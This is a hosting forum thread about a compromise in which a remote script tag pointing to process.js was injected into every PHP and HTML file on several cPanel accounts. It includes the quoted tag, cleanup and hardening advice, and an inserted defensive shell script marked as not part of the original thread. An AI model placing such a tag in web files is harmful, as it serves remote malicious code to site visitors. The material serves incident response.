Thread: security problem, php and html files vulnerability

  1. #1
    Member
    Join Date
    Jul 2005
    Posts
    249

    security problem, php and html files vulnerability

    For 2 days I have had a problem with some accounts on some of my VPSes with cPanel.

    I must find and replace a specific string in all accounts. I find this in all PHP and HTML files on some FTP roots:

    <script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>

    in the first line of every file, and I must run a combination of find and sed commands to remove it.
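
Added example, not part of the original thread: a cleanup of the kind the first post asks for, matching the quoted tag as a fixed string instead of a sed regex and keeping a copy of each infected file for later analysis. The function names and the docroot and evidence-directory arguments are assumptions; the tag is the one quoted in the post.

```shell
#!/bin/sh
# Added example. TAG is the string quoted in the post; all paths are assumptions.
TAG='<script type="text/javascript" src="http://domainname.com/wp-content/uploads/process.js"></script>'
export TAG

# True if line 1 of file $1 begins with TAG. Quoting "$TAG" in the case
# pattern makes it a literal prefix match, so no regex escaping is needed.
is_infected() {
    first=$(head -n 1 "$1")
    case $first in "$TAG"*) return 0 ;; *) return 1 ;; esac
}

# Strip TAG from line 1 of file $1; drop the line if nothing else was on it.
# Writing back with cat keeps the file's owner and mode, which suPHP checks.
clean_file() {
    is_infected "$1" || return 0
    tmp=$(mktemp) || return 1
    awk 'NR == 1 { rest = substr($0, length(ENVIRON["TAG"]) + 1)
                   if (rest == "" || rest == "\r") next
                   $0 = rest }
         { print }' "$1" > "$tmp" && cat "$tmp" > "$1"
    rc=$?
    rm -f "$tmp"
    return $rc
}

# Walk docroot $1, copy each infected file to evidence dir $2 (keep it outside
# the web root so PHP source is not served as a backup file), then clean the
# original in place. Prints the number of files cleaned.
clean_tree() {
    root=$1 evidence=$2 count=0
    list=$(mktemp) || return 1
    find "$root" -type f \( -name '*.php' -o -name '*.html' \) > "$list"
    while IFS= read -r f; do
        if is_infected "$f"; then
            mkdir -p "$evidence/$(dirname "$f")"
            cp -p "$f" "$evidence/$f" && clean_file "$f" && count=$((count + 1))
        fi
    done < "$list"
    rm -f "$list"
    echo "$count"
}

if [ $# -ge 2 ]; then clean_tree "$1" "$2"; fi
```

The preserved copies keep their original timestamps (`cp -p`), which helps when correlating the injection time with the FTP and web logs discussed in the replies.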

  2. #2
    Member
    Join Date
    Jul 2005
    Posts
    249

    Re: security problem, php and html files vulnerability

    For security I changed some account passwords, but I checked the FTP log and do not see activity from this.

  3. #3
    Member
    Join Date
    Jan 2003
    Posts
    205

    Re: security problem, php and html files vulnerability

    It sounds like your server may have been rooted/compromised. Try and contact Steve at
    http://www.rack911.com/

  4. #4
    Member
    Join Date
    Jul 2005
    Posts
    249

    Re: security problem, php and html files vulnerability

    I use CentOS 6 and the suPHP module.

  5. #5
    Member
    Join Date
    Jan 2003
    Posts
    205

    Re: security problem, php and html files vulnerability

    That makes no difference whatsoever. If all of your sites are serving malware, the server has most likely been compromised in some way, possibly rooted. You need an expert to look at it and help you get it up and running normally again... and secure it against future problems.

  6. #6
    Member
    Join Date
    Jul 2012
    Posts
    36
    cPanel/WHM Access Level

    Root Administrator

    Re: security problem, php and html files vulnerability

    If all the domains on the same server were not affected then the server isn't owned, the domains have been compromised. Which usually means the passwords for those passwords were stolen from infected desktops. Check your logs, particularly your FTP logs, to see if these files are just being uploaded. If they are, it's stolen credentials and fairly easy to fix, just change the users' passwords and restore the domain files from good backups.

    If every domain on the same server is affected the server might be owned. If you aren't sure, reinstall the entire box from scratch and lock it down, or hire someone to lock it down. Trying to clean up an owned server is next to impossible, especially if a kernel rootkit got installed.

  7. #7
    Member
    Join Date
    Apr 2011
    Location
    US
    Posts
    209
    cPanel/WHM Access Level

    Root Administrator

    Re: security problem, php and html files vulnerability

    You should also install mod_security w/ atomic rules. Also always update your scripts to the latest versions.

  8. #8
    Member konrath's Avatar
    Join Date
    May 2005
    Location
    Brasil
    Posts
    320

    Re: security problem, php and html files vulnerability

    Hello

    Verify if enable_dl is on in php.ini. If on, then turn it off.

    Thank you
    Konrath

  9. #9
    BANNED
    Join Date
    Apr 2012
    Location
    Utah
    Posts
    117
    cPanel/WHM Access Level

    DataCenter Provider

    Re: security problem, php and html files vulnerability

    "I use Centos 6 and suPHP module"

    SuPHP is substantially better than DSO (mod_php) but doesn't in itself prevent any cross-site injection or scripting.

    The problem you have described originates from an exploit from a vulnerable web script, usually either an old version of osCommerce or an old version of WordPress about 70% of the time.

    Most of the other 30% typically originates from the user being compromised with a trojan at home that allows the hackers to just simply steal their passwords from their own computers.

    Once a single site has successfully been compromised, it is generally trivial to compromise the rest of the hosting accounts from within the server unless really hardcore security measures have been actively put into place --- for most hosting administrators on average, they probably haven't done that.

    The discussion of what all you need to do to properly lock down your server correctly is much too lengthy to really be able to write in a single forum post and would be an extended discussion in and of itself.

    What I would recommend doing in the immediate right now before looking into any of that, is first get all your clients' web scripts and applications fully up to the minute up to date with the newest versions and don't allow anyone to run anything that is in any way significantly old ---- allowing clients to run old scripts is just asking for trouble in itself.
